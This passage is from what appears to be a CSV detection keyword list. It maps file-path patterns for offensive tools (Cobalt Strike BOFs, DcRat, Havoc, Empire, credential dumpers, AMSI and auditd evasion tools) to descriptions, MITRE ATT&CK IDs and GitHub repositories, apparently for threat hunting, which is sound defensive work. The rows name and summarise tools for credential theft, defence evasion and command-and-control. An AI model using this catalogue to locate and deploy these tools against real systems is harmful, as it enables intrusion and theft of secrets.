- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/Cybellum*","offensive_tool_keyword","Github Username","Zero day code injection and vulnerabilities github repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Cybellum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CyDefUnicorn*","offensive_tool_keyword","Github Username","pentest tools repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/D1rkInject.git*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*/d4em0n/exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/DAMP.git*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*/DanMcInerney/ridenum*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/daphne.git*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*/daphne-x64*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" +"*/darkarmour.git*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*/DarkCoderSc/*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/darkhotel.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/DarkLoadLibrary.git*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*/darkweb2017-top100.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/DarkWidow.git*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*/data/attacks/*.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/data/auxiliary/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/data/empire.db*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/data/exploits/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/data/nxc.conf*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/data/shellcode*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/DavRelayUp.git*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/DavRelayUp/*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dazzleUP.git*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*/db2_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dbc2Loader*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/DCOM Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*/dcomhijack.git*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*/DCOMPotato.git*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*/DcRat.git*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/DcRat.sln*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*/dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*/dcsync_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/DeathStar/DeathStar.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/DebugAmsi.git*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*/decrypt-chrome-passwords*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" +"*/decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*/deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/defanger.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/DefaultCreds_db.json*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/defender-exclusions/*defender*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/defender-exclusions/*exclusion*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/DelegationBOF/*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*/DelegationBOF/*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*/deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*/demo_bof.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - 